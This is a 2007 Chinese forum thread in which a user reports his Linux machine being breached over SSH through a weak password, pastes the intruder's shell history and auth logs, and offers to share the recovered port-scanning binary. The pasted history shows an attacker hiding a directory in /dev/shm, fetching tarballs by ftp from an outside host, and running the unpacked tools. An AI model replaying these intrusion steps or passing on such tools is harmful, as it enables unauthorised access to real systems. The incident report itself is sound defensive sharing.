免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 IT运维 数据安全 今天,被一个外国菜鸟黑了。
最近访问板块 发新帖
查看: 3719 | 回复: 2
打印 上一主题 下一主题

今天,被一个外国菜鸟黑了。 [复制链接]

Jeremiah.R

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2007-05-13 01:58 |只看该作者 |倒序浏览
太巧合了,
今天,我在图书馆自修,自己的机器在寝室里开着。
回来结果,一看吓了一大跳。
按照我的习惯lastlog,
一看,一个兄弟从AC83C13D.ipt.aol.com
ssh到我的主机。那小子运气太好了,我正好在路由器中
大开了ssh NAT 到我的主机(我在图书馆有点东东要在我的机器上跑),
我的用户名和密码都是一样的jeremiah:jeremiah
这小子估计写了个程序(字典暴力破解),进入了我的系统。
由于发现的及时,那小子还在做事,文件没有损失,历史记录还没有
被修改。下面是他的小动作。
310  touch
  311  uname
  312  w
  313  hostname
  314  passwd
  315  ls
  316  cd /dev/shm
  317  ls
  318  mkdir ". /"
  319  cd ". /"
  320  ftp redclubtm.netfirms.com
  321  ls
  322  tar zxvf 0.tgz
  323  tar zxvf copi.tgz
  324  tar zxvf hosts.tgz
  325  tar zxvf ker.tgz
  326  tar zxvf newd.tgz
  327  tar xvf newd.tgz
  328  ls
  329  rm -rf 0.tgz copi.tgz hosts.tgz ker.tgz newd.tgz
  330  ls
  331  chmod +x *
  332  export PATH=.PATH
  333  ker
  334  0
  335  rm -rf 0 ker
  336  cd hosts
  337  ls
  338  rm -rf nobash.txt vuln.txt
  339  chmod +x *
  340  export PATH=.PATH

May 12 22:34:59 redhat passwd: pam_unix(passwd:chauthtok): password changed for jeremiah
May 12 22:48:37 redhat passwd: pam_unix(passwd:chauthtok): authentication failure; logname= uid=500 euid=0 tty=pts/2 ruser= rhost=  user=jeremiah
May 12 22:49:14 redhat passwd: pam_unix(passwd:chauthtok): authentication failure; logname= uid=500 euid=0 tty=pts/2 ruser= rhost=  user=jeremiah


从这
318  mkdir ". /"
  319  cd ". /"
来看,这兄弟老玩了,不过本地提升为root,
在我的机器上,是不可能的事.

那些文件保密,只是binary,是一个扫描开22端口的主机的程序,有需要的联系我。
Yuri.G.

论坛徽章:
0
2 [报告]
发表于 2007-05-23 15:25 |只看该作者
哥们给我一份我研究研究
laosi923#163.com
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
wmdehao123

论坛徽章:
0
3 [报告]
发表于 2007-06-05 17:13 |只看该作者
有点 高深 ,我 对哪些高深的 命令不怎么懂 能不能后面给 注释下是什么意思 我初学,先谢谢了~
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP